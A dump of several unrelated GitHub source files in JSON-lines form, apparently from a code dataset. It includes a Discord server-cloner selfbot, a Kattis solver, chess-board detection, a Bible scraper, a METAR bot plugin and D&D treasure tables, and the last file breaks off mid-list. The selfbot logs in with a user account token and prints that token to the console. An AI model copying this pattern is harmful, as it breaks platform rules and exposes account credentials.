'clear')\r\n\r\nintents = discord.Intents.all()\r\nintents.members = True\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(' ,---. ,-----.,--. ') #per cambiare font/scritta --> https://devops.datenkollektiv.de/banner.txt/index.html\r\n print(\"' .-' ,---. ,--.--.,--. ,--.,---. ,--.--. ' .--./| | ,---. ,--,--, ,---. ,--.--.\")\r\n print(\"`. `-.| .-. :| .--' \\ `' /| .-. :| .--' | | | || .-. || \\ .-. :| .--'\")\r\n print(\".-' \\ --.| | \\ / \\ --.| | ' '--'\\| |' '-' '| || \\ --.| | \")\r\n print(\"`-----' `----'`--' `--' `----'`--' `-----'`--' `---' `--''--'`----'`--'\", '{}{} V1.0 {}'.format(Fore.RESET, Fore.RED, Fore.RESET)) #versione del Selfbot\r\n print(\" {}{}[ {}\".format(Fore.RESET, Fore.RED, Fore.RESET),end=\"\")\r\n print(\"{}{}Coded BY Nico{}\".format(Fore.RESET, Fore.GREEN, Fore.RESET),end=\"\")\r\n print(\"{}{} ]{}\".format(Fore.RESET, Fore.RED, Fore.RESET),\"\\n\\n\")\r\n \r\n\r\n\r\n print('{}\\n[>] {} Cloner running... {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\n print('{}\\n[>] {} Command:{} {}copyserver\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n print('{}\\n[>] {} User info:{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix)) \r\n print(' - Logged in as ' + client.user.name)\r\n print(' - User ID: ' + str(client.user.id))\r\n print(' - User Token: ' + token)\r\n\r\n\r\n\r\n@client.command()\r\nasync def copyserver(ctx): #richiamo al comando copyserver\r\n \r\n print('{}\\n[>] {} cloning enabled... {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET)) #inizo del processo di clonazione\r\n await ctx.message.delete()\r\n wow = await client.create_guild(f'backup-{ctx.guild.name}')\r\n await asyncio.sleep(4) \r\n print('{}\\n[>] {} Server created {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))#creazione del server completata\r\n\r\n print(\"{}\\n[>]{} I'm cloning the channels....{}\".format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET)) #clonazione dei canali\r\n for g in client.guilds:\r\n if f'backup-{ctx.guild.name}' in g.name:\r\n for c in g.channels:\r\n await c.delete()\r\n for cate in ctx.guild.categories:\r\n x = await g.create_category(f\"{cate.name}\")\r\n for chann in cate.channels:\r\n if isinstance(chann, discord.VoiceChannel):\r\n await x.create_voice_channel(f\"{chann}\")\r\n if isinstance(chann, discord.TextChannel):\r\n await x.create_text_channel(f\"{chann}\")\r\n print(ctx.guild.roles,)\r\n print('{}\\n[>]{} Roles cloned:{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n for role in ctx.guild.roles[::-1]:\r\n if role.name != \"@everyone\":\r\n try:\r\n await wow.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)\r\n print(f\"Created new role : {role.name}\")\r\n except:\r\n break\r\n print('{}\\n[>]{} Cloning completed{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n\r\nclient.run(token, bot=False)","repo_name":"NicoDevv/Discord-Server-Cloner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"50"} +{"seq_id":"73397120475","text":"import sys\n\n\ndef produce_stats(i, line):\n values = list(map(int, line.split(' ')))\n values = values[1:]\n maximum = float('-inf')\n minimum = float('inf')\n\n for val in values:\n if val > maximum:\n maximum = val\n if val < minimum:\n minimum = val\n\n return f\"Case {i}: {minimum} {maximum} {maximum - minimum}\"\n\n\nif __name__ == '__main__':\n\n inputs = []\n for line in sys.stdin:\n inputs.append(line)\n# with open('sample_data/sample.in') as f:\n# inputs = [line.strip() for line in f]\n\nfor i in range(len(inputs)):\n print(produce_stats(i+1, inputs[i]))\nexit(0)","repo_name":"curt-mitch/kattis","sub_path":"statistics/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1055594954","text":"from numpy import pi\nimport cv2 \nfrom board_state_utils import SQUARE_SIZE\n\ndef add_boundaries(board_width,h,v,error): \n\t\"\"\"\n Add horizontal and vertical lines to the boundary of the extracted board\n \"\"\"\n\tif not (h[0][0] < error):\n\t\th.insert(0,[1.,h[0][1]])\n\th[0][0] = 1\n\tif not (h[-1][0] > board_width - error):\n\t\th.append([board_width,h[-1][1]])\n\th[-1][0] = board_width\n\tif not (v[0][0] < error):\n\t\tv.insert(0,[1.,v[0][1]])\n\tv[0][0] = 1\n\n\tif not (v[-1][0] > board_width - error):\n\t\tv.append([board_width,v[-1][1]])\n\tv[-1][0] = board_width\n\n\treturn h , v\n\ndef hor_vert_lines(lines):\n\t\"\"\"\n\tA line is given by rho and theta. Given a list of lines, returns a list of\n\thorizontal lines (theta=90 deg) and a list of vertical lines (theta=0 deg).\n\t\"\"\"\n\th = []\n\tv = []\n\tfor line in lines:\n\t\tfor distance, angle in line:\n\t\t\tif angle < pi / 4 or angle > pi - pi / 4:\n\t\t\t\tv.append([distance, angle])\n\t\t\telse:\n\t\t\t\th.append([distance, angle])\n\th.sort(key = lambda x : x[0])\n\tv.sort(key = lambda x : x[0])\n\treturn h, v\n\n\ndef sort_cnts(cnt):\n\t\"\"\"\n Used for sorting an array of contours based on the their width\n \"\"\"\n\tx,y,w,h = cv2.boundingRect(cnt)\n\treturn w\n\ndef get_largest_sq(binary):\n\t\"\"\"\n Retrun the largest square object found in the given binary Image\n\tAnd it should be the chess board\n \"\"\"\n\t#Image Processing to connect board checker pattern for contour extraction\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(1,1))\n\tbinary = cv2.morphologyEx(binary, cv2.MORPH_CLOSE, kernel)\n\tbinary = cv2.morphologyEx(binary, cv2.MORPH_OPEN, kernel)\n\t####Modification of image due to chess board borders####\n\tbinary = cv2.Canny(binary,50,150,apertureSize = 3)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(2,2))\n\tbinary = cv2.dilate(binary,kernel,iterations = 1)\n\t####Modification of image due to chess board borders####\n\n\t#Find All Contours\n\t# cnts = cv2.findContours(binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #Doesn't work if there was larger border\n\tcnts = cv2.findContours(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\tcnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\t\n\t\n\t#Retrieve only the square contours with an error of {error}\n\tsq_cnts = []\n\terror = 5\n\tfor c in cnts:\n\t\tx,y,w,h = cv2.boundingRect(c)\n\t\tif abs(w - h) < error:\n\t\t\tsq_cnts.append(c)\n\t\n\t#Sort the square contours to retrieve the largest square contour \n\tif sq_cnts:\n\t\tsq_cnts.sort(key=sort_cnts,reverse=True)\n\t\tx,y,w,h = cv2.boundingRect(sq_cnts[0])\n\t\treturn x,y,w,h\n\t\n\telse:\n\t\treturn 0 ,0 , 0 , 0\n\t\t\n\ndef get_board_image(color):\n\t\"\"\"\n Return the extracted largest squared contour from a given image \n \"\"\"\n\t#Color to grey\n\tgrey = cv2.cvtColor(color, cv2.COLOR_BGR2GRAY)\n\n\t#Apply both threshold modes to determine which one produces the largest square\n\tret,img1 = cv2.threshold(grey,150,255,cv2.THRESH_BINARY)\n\tret,img2 = cv2.threshold(grey,150,255,cv2.THRESH_BINARY_INV)\n\n\t#Retrieve largest squares for both modes\n\tx1,y1,w1,h1 = get_largest_sq(img1)\n\tx2,y2,w2,h2 = get_largest_sq(img2)\n\n\n\tprint('w1 : ',w1)\n\tprint('w2 : ',w2)\n\n\t#No Sqaures found\n\tif (w1 is 0) and (w2 is 0):\n\t\treturn False , False\n\n\n\tif w1 > w2 : #Find which mode INV or NOT INV detected the largest square\n\t\tgrey_image = grey[y1:y1+h1, x1:x1+w1]\n\t\tcolor_image = color[y1:y1+h1, x1:x1+w1]\n\telse:\n\t\tgrey_image = grey[y2:y2+h2, x2:x2+w2]\n\t\tcolor_image = color[y2:y2+h2, x2:x2+w2]\n\t\n\treturn grey_image,color_image\n\ndef extract_pattern(board,h,v):\n\t\"\"\"\n Check if the chess board patter found in the extracted square \n\tand return the square that matched pattern only removing redundant pixels\n \"\"\"\n\terror = 5\n\thorz_pattern = False\n\tvert_pattern = False\n\tboard_found = False\n\n\t#Check horizontal pattern\n\tspacing = 5000\n\tstarting_h = 0\n\tcheckers_found = 1\n\tfor index in range(0,len(h)-1):\n\t\tif abs (h[index+1][0]-h[index][0] - spacing) > error:\n\t\t\tstarting_h = index\n\t\t\tcheckers_found = 1\n\t\t\tspacing = h[index+1][0]-h[index][0]\n\t\telse:\n\t\t\tcheckers_found = checkers_found + 1\n\t\tif checkers_found is 8:\n\t\t\tprint('Horizontal pattern found')\n\t\t\thorz_pattern = True\n\t\t\tbreak\n\t\t\n\t#Check vertical pattern\n\tspacing = 5000\n\tstarting_v = 0\n\tcheckers_found = 1\n\tfor index in range(0,len(v)-1):\n\t\tif abs (v[index+1][0]-v[index][0] - spacing) > error:\n\t\t\tstarting_v = index\n\t\t\tcheckers_found = 1\n\t\t\tspacing = v[index+1][0]-v[index][0]\n\t\telse:\n\t\t\tcheckers_found = checkers_found + 1\n\t\tif checkers_found is 8:\n\t\t\tprint('Vertical pattern found')\n\t\t\tvert_pattern = True\n\t\t\tbreak\n\t\n\t#Is Horizontal and Vertical Patterns Found \n\tif vert_pattern and horz_pattern:\n\t\tboard_found = True\n\t\tboard = board[int(h[starting_h][0]):int(h[starting_h + 8][0]),int(v[starting_v][0]):int(v[starting_v + 8][0])]\n\t\t\n\t\treturn board_found , board\n\telse:\n\t\treturn board_found , []\n\ndef extract_board(img):\n\t\"\"\"\n Given a screenshot image from the user , extract a chess board if found\n \"\"\"\n\t#Get largest square in the image\n\tgrey_board , color_board = get_board_image(img)\n\n\t#Check if a sqaure was found\n\tif color_board is False:\n\t\tprint(\"Not Square\")\n\t\treturn False , None\n\n\t#Check if the size is at least the acceptable board size\n\t#TODO Scale up the image a bit if it was close to the min size\n\tif color_board.shape[0] < SQUARE_SIZE * 8:\n\t\tprint(\"Not good size\")\n\t\treturn False , None\n\n\t#Get hough lines from the extracted square\n\timg_e = cv2.Canny(grey_board,50,150,apertureSize = 3)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(2,2))\n\timg_e = cv2.dilate(img_e,kernel,iterations = 1)\n\tlines = cv2.HoughLines(img_e,1,pi/180,int(3/4 * len(color_board)))\n\n\t#Get horz and vert lines to check the pattern\n\th, v = hor_vert_lines(lines)\n\th, v = add_boundaries(len(color_board),h,v,5)\n\n\t#Extract the pattern\n\tboard_found , ex_board = extract_pattern(color_board,h,v)\n\n\tif board_found:\n\t\tcolor_board = ex_board\n\t\treturn board_found , color_board\n\n\telse:\n\t\treturn board_found , None\n","repo_name":"DyaPlus/ChessPlayer","sub_path":"board_extraction.py","file_name":"board_extraction.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24922915857","text":"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\ndf = pd.read_csv('../data/model_128x4_64_64_2.csv', index_col=None)\n#df = pd.read_csv('../data/model_20x5_30x4_42_7_2.csv', index_col=None)\ndf.columns = ['agent', 'rate']\ndf['x100'] = range(0, len(df))\n\nplt.figure(figsize=(14,6))\nfig = sns.lineplot(df.x100, df.rate, hue=df.agent)\nfig.set(xlabel='Number of games x100', ylabel='Winning rate')\nfig.set(ylim=(0, 1))\nplt.show()\n","repo_name":"arvjus/connect4","sub_path":"src/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11876254418","text":"#!/usr/bin/env python3\nimport requests\nfrom html.parser import HTMLParser\nfrom html.entities import name2codepoint\n\nwriting = False\nout = None\nweird = False\n\nout_all = open('Bible.txt', 'w')\n\nclass MyHTMLParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n global writing, out, out_all, weird\n if tag == 'div':\n if dict(attrs).get('class') in ['usfm_s1', 'usfm_p', 'MsoNormal', 'usfm_q', 'usfm_sp']:\n writing = True\n else:\n writing = False\n elif tag == 'b' and writing:\n out.write('\\n')\n out_all.write('\\n')\n elif tag == 'title':\n writing = True\n\n def handle_endtag(self, tag):\n global writing, out, out_all\n if tag == 'div' and writing:\n out.write('\\n')\n out_all.write('\\n')\n if tag == 'title' or tag == 'div':\n writing = False\n\n def handle_data(self, data):\n global writing, out, out_all\n if writing:\n if not out:\n t = data.strip()\n out = open('Bible/' + t + '.txt', 'w')\n out_all.write('\\n' + t + '\\n\\n')\n else:\n s = data.replace(' ', ' ')\n out.write(s)\n out_all.write(s)\n\nclass WeirdHTMLParser(MyHTMLParser):\n def handle_starttag(self, tag, attrs):\n global writing, out, out_all, weird\n if tag == 'title':\n writing = True\n elif tag == 'span' and weird:\n writing = True\n elif tag == 'div' and dict(attrs).get('class') == 'section js-section':\n weird = True\n elif tag == 'br':\n out.write('\\n')\n out_all.write('\\n')\n def handle_endtag(self, tag):\n global writing, out, out_all\n if tag == 'span' and writing:\n out.write(' ')\n out_all.write(' ')\n if tag == 'span' or tag == 'title':\n writing = False\n\nwith open('Bible_links.txt') as fin:\n for line in fin:\n ls = line.split()\n if len(ls) == 1:\n parser = MyHTMLParser()\n r = requests.get(line.strip())\n parser.feed(r.text)\n else:\n parser = WeirdHTMLParser()\n r = requests.get(ls[0])\n parser.feed(r.text)\n out.close()\n out = None\n weird = False\n\nout_all.close()\n","repo_name":"mr-martian/hyw-corpus","sub_path":"Bibles/Bible_western/hyw.bibleOTNT.asdvadzashunch/bible-scrape.py","file_name":"bible-scrape.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"71622079196","text":"\"\"\"\nLooks up the most recent METAR/TAF weather report for the supplied ICAO\nairport code.\n /bot metar \n /bot taf \n\nICAO Airport Codes:\nhttps://wikipedia.org/wiki/ICAO_airport_code\nMETAR source: http://aviationweather.gov\n\"\"\"\n\nimport logging\nfrom xml.etree import ElementTree\n\nimport aiohttp\n\nfrom hangupsbot import plugins\n\n\nlogger = logging.getLogger(__name__)\n\nHELP = {\n 'metar': _('Display the current METAR weather report for the supplied '\n 'ICAO airport code.\\n'\n ' {bot_cmd} metar \\n'\n 'ICAO Airport Codes: https://wikipedia.org/wiki/ICAO_airport_code'\n '\\nMETAR source: http://aviationweather.gov'),\n\n 'taf': _('Looks up the most recent TAF weather forecast for the supplied '\n 'ICAO airport code.\\n'\n ' {bot_cmd} taf \\n'\n 'ICAO Airport Codes: https://wikipedia.org/wiki/ICAO_airport_code\\n'\n 'TAF source: http://aviationweather.gov'),\n}\n\n\ndef _initialize():\n plugins.register_user_command([\n 'metar',\n 'taf',\n ])\n plugins.register_help(HELP)\n\n\nasync def _api_lookup(target, station):\n api_url = (\"http://aviationweather.gov/adds/dataserver_current/httpparam\"\n \"?dataSource={0}s&requestType=retrieve&format=xml&hoursBeforeNow\"\n \"=3&mostRecent=true&stationString={1}\").format(target, station)\n logger.debug('api call %s: url %r', id(api_url), api_url)\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(api_url) as response:\n response.raise_for_status()\n raw_text = await response.text()\n except aiohttp.ClientError as err:\n if not logger.isEnabledFor(logging.DEBUG):\n # add context\n logger.info('api call %s: url %r', id(api_url), api_url)\n logger.error(\n \"api call %s: failed with %r\",\n id(api_url), err\n )\n return None\n\n logger.debug('api call %s: raw %r', id(api_url), raw_text)\n\n try:\n root = ElementTree.fromstring(raw_text)\n raw = root.findall('data/{}/raw_text'.format(target))\n except ElementTree.ParseError as err:\n if not logger.isEnabledFor(logging.DEBUG):\n # add context\n logger.info('api call %s: url %r', id(api_url), api_url)\n logger.info('api call %s: raw %r', id(api_url), raw_text)\n\n logger.error(\n \"api call %s: parse error %r\",\n id(api_url), err\n )\n return None\n return raw\n\n\nasync def metar(dummy0, dummy1, *args):\n \"\"\"Display the current METAR weather report for the supplied ICAO airport\"\"\"\n code = ''.join(args).strip()\n if not code:\n return _(\"You need to enter the ICAO airport code you wish the look up,\"\n \"https://wikipedia.org/wiki/ICAO_airport_code\")\n\n data = await _api_lookup('METAR', code)\n\n if data is None:\n return _(\"There was an error retrieving the METAR information.\")\n if not data:\n return _(\"The response did not contain METAR information, check the \"\n \"ICAO airport code and try again.\")\n return data[0].text\n\n\nasync def taf(dummy0, dummy1, *args):\n \"\"\"Looks up the most recent TAF weather forecast for the supplied airport\"\"\"\n\n code = ''.join(args).strip()\n if not code:\n return _(\"You need to enter the ICAO airport code you wish the look up,\"\n \" https://wikipedia.org/wiki/ICAO_airport_code\")\n\n data = await _api_lookup('TAF', code)\n\n if data is None:\n return _(\"There was an error retrieving the TAF information.\")\n if not data:\n return _(\"The response did not contain TAF information, check the \"\n \"ICAO airport code and try again.\")\n return data[0].text\n","repo_name":"das7pad/hangoutsbot","sub_path":"hangupsbot/plugins/metar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"4863951697","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Treasure Generators for Crawler I\n# by Brock Glaze\n#\n# crCalc_Treasure_Wondrous.py\n\n\nimport crawler\nimport crDice\nimport string\nimport wx\n\n\n#-----------------------------------------------------------------------\n#------ Generate Minor Wondrous Item (Table 7-27, Page 247) ------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMinorWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"Quaal's feather token, anchor\", 50),\n (\"universal solvent\", 50),\n (\"elixir of love\", 150),\n (\"unguent of timelessness\", 150),\n (\"Quaal's feather token, fan\", 200),\n (\"dust of tracelessness\", 250),\n (\"elixir of hiding\", 250),\n (\"elixir of sneaking\", 250),\n (\"elixir of swimming\", 250),\n (\"elixir of vision\", 250),\n (\"silversheen\", 250),\n (\"Quaal's feather token, bird\", 300),\n (\"Quaal's feather token, tree\", 400),\n (\"Quaal's feather token, swan boat\", 450),\n (\"elixir of truth\", 500),\n (\"Quaal's feather token, whip\", 500),\n (\"dust of dryness\", 850),\n (\"bag of tricks, gray\", 900),\n (\"hand of the mage\", 900),\n (\"bracers of armor +1\", 1000),\n (\"cloak of resistance +1\", 1000),\n (\"pearl of power, 1st-level spell\", 1000),\n (\"phylactery of faithfulness\", 1000),\n (\"salve of slipperiness\", 1000),\n (\"elixir of fire breath\", 1100),\n (\"pipes of the sewers\", 1150),\n (\"dust of illusion\", 1200),\n (\"goggles of minute seeing\", 1250),\n (\"brooch of shielding\", 1500),\n (\"necklace of fireballs type I\", 1650),\n (\"dust of appearance\", 1800),\n (\"hat of disguise\", 1800),\n (\"pipes of sounding\", 1800),\n (\"quiver of Ehlonna\", 1800),\n (\"amulet of natural armor +1\", 2000),\n (\"Heward's handy haversack\", 2000),\n (\"horn of fog\", 2000),\n (\"elemental gem\", 2250),\n (\"robe of bones\", 2400),\n (\"sovereign glue\", 2400),\n (\"bag of holding type I\", 2500),\n (\"boots of elvenkind\", 2500),\n (\"boots of the winterlands\", 2500),\n (\"candle of truth\", 2500),\n (\"cloak of elvenkind\", 2500),\n (\"eyes of the eagle\", 2500),\n (\"scarab, golembane\", 2500),\n (\"necklace of fireballs type II\", 2700),\n (\"stone of alarm\", 2700),\n (\"bag of tricks, rust\", 3000),\n (\"bead of force\", 3000),\n (\"chime of opening\", 3000),\n (\"horseshoes of speed\", 3000),\n (\"rope of climbing\", 3000),\n (\"dust of disappearance\", 3500),\n (\"lens of detection\", 3500),\n (\"vestment, druid's\", 3750),\n (\"figurine of wondrous power, silver raven\", 3800),\n (\"amulet of health +2\", 4000),\n (\"bracers of armor +2\", 4000),\n (\"cloak of charisma +2\", 4000),\n (\"cloak of resistance +2\", 4000),\n (\"gauntlets of ogre power\", 4000),\n (\"gloves of arrow snaring\", 4000),\n (\"gloves of dexterity +2\", 4000),\n (\"headband of intellect +2\", 4000),\n (\"ioun stone, clear spindle\", 4000),\n (\"Keoghtom's ointment\", 4000),\n (\"Nolzur's marvelous pigments\", 4000),\n (\"pearl of power, 2nd-level spell\", 4000),\n (\"periapt of wisdom +2\", 4000),\n (\"stone salve\", 4000),\n (\"necklace of fireballs type III\", 4350),\n (\"circlet of persuasion\", 4500),\n (\"slippers of spider climbing\", 4800),\n (\"incense of meditation\", 4900),\n (\"bag of holding type II\", 5000),\n (\"bracers of archery, lesser\", 5000),\n (\"ioun stone, dusty rose prism\", 5000),\n (\"helm of comprehend languages and read magic\", 5200),\n (\"vest of escape\", 5200),\n (\"eversmoking bottle\", 5400),\n (\"Murlynd's spoon\", 5400),\n (\"necklace of fireballs type IV\", 5400),\n (\"boots of striding and springing\", 5500),\n (\"wind fan\", 5500),\n (\"amulet of mighty fists +1\", 6000),\n (\"horseshoes of a zephyr\", 6000),\n (\"pipes of haunting\", 6000),\n (\"necklace of fireballs type V\", 6150),\n (\"gloves of swimming and climbing\", 6250),\n (\"bag of tricks, tan\", 6300),\n (\"circlet of blasting, minor\", 6480),\n (\"horn of goodness/evil\", 6500),\n (\"robe of useful items\", 7000),\n (\"boat, folding\", 7200),\n (\"cloak of the manta ray\", 7200),\n (\"bottle of air\", 7250),\n (\"bag of holding type III\", 7400),\n (\"periapt of health\", 7400)\n )\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate Medium Wondrous Item (Table 7-28, Page 249) -----------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMediumWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"boots of levitation\", 7500),\n (\"harp of charming\", 7500),\n (\"amulet of natural armor +2\", 8000),\n (\"golem manual, flesh\", 8000),\n (\"hand of glory\", 8000),\n (\"ioun stone, deep red sphere\", 8000),\n (\"ioun stone, incandescent blue sphere\", 8000),\n (\"ioun stone, pale blue rhomboid\", 8000),\n (\"ioun stone, pink and green sphere\", 8000),\n (\"ioun stone, pink rhomboid\", 8000),\n (\"ioun stone, scarlet and blue sphere\", 8000),\n (\"deck of illusions\", 8100),\n (\"necklace of fireballs type VI\", 8100),\n (\"candle of invocation\", 8400),\n (\"bracers of armor +3\", 9000),\n (\"cloak of resistance +3\", 9000),\n (\"decanter of endless water\", 9000),\n (\"necklace of adaptation\", 9000),\n (\"pearl of power, 3rd-level spell\", 9000),\n (\"talisman of the sphere\", 9000),\n (\"figurine of wondrous power, serpentine owl\", 9100),\n (\"necklace of fireballs type VII\", 9150),\n (\"strand of prayer beads, lesser\", 9600),\n (\"bag of holding type IV\", 10000),\n (\"figurine of wondrous power, bronze griffon\", 10000),\n (\"figurine of wondrous power, ebony fly\", 10000),\n (\"glove of storing\", 10000),\n (\"ioun stone, dark blue rhomboid\", 10000),\n (\"stone horse, courser\", 10000),\n (\"cape of the mountebank\", 10080),\n (\"phylactery of undead turning\", 11000),\n (\"gauntlet of rust\", 11500),\n (\"boots of speed\", 12000),\n (\"goggles of night\", 12000),\n (\"golem manual, clay\", 12000),\n (\"medallion of thoughts\", 12000),\n (\"pipes of pain\", 12000),\n (\"Boccob's blessed book\", 12500),\n (\"belt, monk's\", 13000),\n (\"gem of brightness\", 13000),\n (\"lyre of building\", 13000),\n (\"cloak of arachnida\", 14000),\n (\"stone horse, destrier\", 14800),\n (\"belt of dwarvenkind\", 14900),\n (\"periapt of wound closure\", 15000),\n (\"horn of the tritons\", 15100),\n (\"pearl of the sirines\", 15300),\n (\"figurine of wondrous power, onyx dog\", 15500),\n (\"amulet of health +4\", 16000),\n (\"belt of giant strength +4\", 16000),\n (\"boots, winged\", 16000),\n (\"bracers of armor +4\", 16000),\n (\"cloak of charisma +4\", 16000),\n (\"cloak of resistance +4\", 16000),\n (\"gloves of dexterity +4\", 16000),\n (\"headband of intellect +4\", 16000),\n (\"pearl of power, 4th-level spell\", 16000),\n (\"periapt of wisdom +4\", 16000),\n (\"scabbard of keen edges\", 16000),\n (\"figurine of wondrous power, golden lions\", 16500),\n (\"chime of interruption\", 16800),\n (\"broom of flying\", 17000),\n (\"figurine of wondrous power, marble elephant\", 17000),\n (\"amulet of natural armor +3\", 18000),\n (\"ioun stone, iridescent spindle\", 18000),\n (\"bracelet of friends\", 19000),\n (\"carpet of flying, 5 ft. by 5 ft.\", 20000),\n (\"horn of blasting\", 20000),\n (\"ioun stone, pale lavender ellipsoid\", 20000),\n (\"ioun stone, pearly white spindle\", 20000),\n (\"portable hole\", 20000),\n (\"stone of good luck (luckstone)\", 20000),\n (\"figurine of wondrous power, ivory goats\", 21000),\n (\"rope of entanglement\", 21000),\n (\"golem manual, stone\", 22000),\n (\"mask of the skull\", 22000),\n (\"mattock of the titans\", 23348),\n (\"circlet of blasting, major\", 23760),\n (\"amulet of mighty fists +2\", 24000),\n (\"cloak of displacement, minor\", 24000),\n (\"helm of underwater action\", 24000),\n (\"bracers of archery, greater\", 25000),\n (\"bracers of armor +5\", 25000),\n (\"cloak of resistance +5\", 25000),\n (\"eyes of doom\", 25000),\n (\"pearl of power, 5th-level spell\", 25000),\n (\"maul of the titans\", 25305),\n (\"strand of prayer beads\", 25800),\n (\"cloak of the bat\", 26000),\n (\"iron bands of Bilarro\", 26000),\n (\"cube of frost resistance\", 27000),\n (\"helm of telepathy\", 27000),\n (\"periapt of proof against poison\", 27000),\n (\"robe of scintillating colors\", 27000),\n (\"manual of bodily health +1\", 27500),\n (\"manual of gainful exercise +1\", 27500),\n (\"manual of quickness in action +1\", 27500),\n (\"tome of clear thought +1\", 27500),\n (\"tome of leadership and influence +1\", 27500),\n (\"tome of understanding +1\", 27500)\n )\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate Major Wondrous Item (Table 7-29, Page 251) ------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMajorWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"dimensional shackles\", 28000),\n (\"figurine of wondrous power, obsidian steed\", 28500),\n (\"drums of panic\", 30000),\n (\"ioun stone, orange\", 30000),\n (\"ioun stone, pale green prism\", 30000),\n (\"lantern of revealing\", 30000),\n (\"robe of blending\", 30000),\n (\"amulet of natural armor +4\", 32000),\n (\"amulet of proof against detection and location\", 35000),\n (\"carpet of flying, 5 ft. by 10 ft.\", 35000),\n (\"golem manual, iron\", 35000),\n (\"amulet of health +6\", 36000),\n (\"belt of giant strength +6\", 36000),\n (\"bracers of armor +6\", 36000),\n (\"cloak of charisma +6\", 36000),\n (\"gloves of dexterity +6\", 36000),\n (\"headband of intellect +6\", 36000),\n (\"ioun stone, vibrant purple prism\", 36000),\n (\"pearl of power, 6th-level spell\", 36000),\n (\"periapt of wisdom +6\", 36000),\n (\"scarab of protection\", 38000),\n (\"ioun stone, lavender and green ellipsoid\", 40000),\n (\"ring gates\", 40000),\n (\"crystal ball\", 42000),\n (\"golem manual, greater stone\", 44000),\n (\"orb of storms\", 48000),\n (\"boots of teleportation\", 49000),\n (\"bracers of armor +7\", 49000),\n (\"pearl of power, 7th-level spell\", 49000),\n (\"amulet of natural armor +5\", 50000),\n (\"cloak of displacement, major\", 50000),\n (\"crystal ball with see invisibility\", 50000),\n (\"horn of Valhalla\", 50000),\n (\"crystal ball with detect thoughts\", 51000),\n (\"carpet of flying, 6 ft. by 9 ft.\", 53000),\n (\"amulet of mighty fists +3\", 54000),\n (\"wings of flying\", 54000),\n (\"cloak of etherealness\", 55000),\n (\"Daern's instant fortress\", 55000),\n (\"manual of bodily health +2\", 55000),\n (\"manual of gainful exercise +2\", 55000),\n (\"manual of quickness in action +2\", 55000),\n (\"tome of clear thought +2\", 55000),\n (\"tome of leadership and influence +2\", 55000),\n (\"tome of understanding +2\", 55000),\n (\"eyes of charming\", 56000),\n (\"robe of stars\", 58000),\n (\"carpet of flying, 10 ft. by 10 ft.\", 60000),\n (\"darkskull\", 60000),\n (\"cube of force\", 62000),\n (\"bracers of armor +8\", 64000),\n (\"pearl of power, 8th-level spell\", 64000),\n (\"crystal ball with telepathy\", 70000),\n (\"horn of blasting, greater\", 70000),\n (\"pearl of power, two spells\", 70000),\n (\"helm of teleportation\", 73500),\n (\"gem of seeing\", 75000),\n (\"robe of the archmagi\", 75000),\n (\"mantle of faith\", 76000),\n (\"crystal ball with true seeing\", 80000),\n (\"pearl of power, 9th-level spell\", 81000),\n (\"well of many worlds\", 82000),\n (\"manual of bodily health +3\", 82500),\n (\"manual of gainful exercise +3\", 82500),\n (\"manual of quickness in action +3\", 82500),\n (\"tome of clear thought +3\", 82500),\n (\"tome of leadership and influence +3\", 82500),\n (\"tome of understanding +3\", 82500),\n (\"apparatus of Kwalish\", 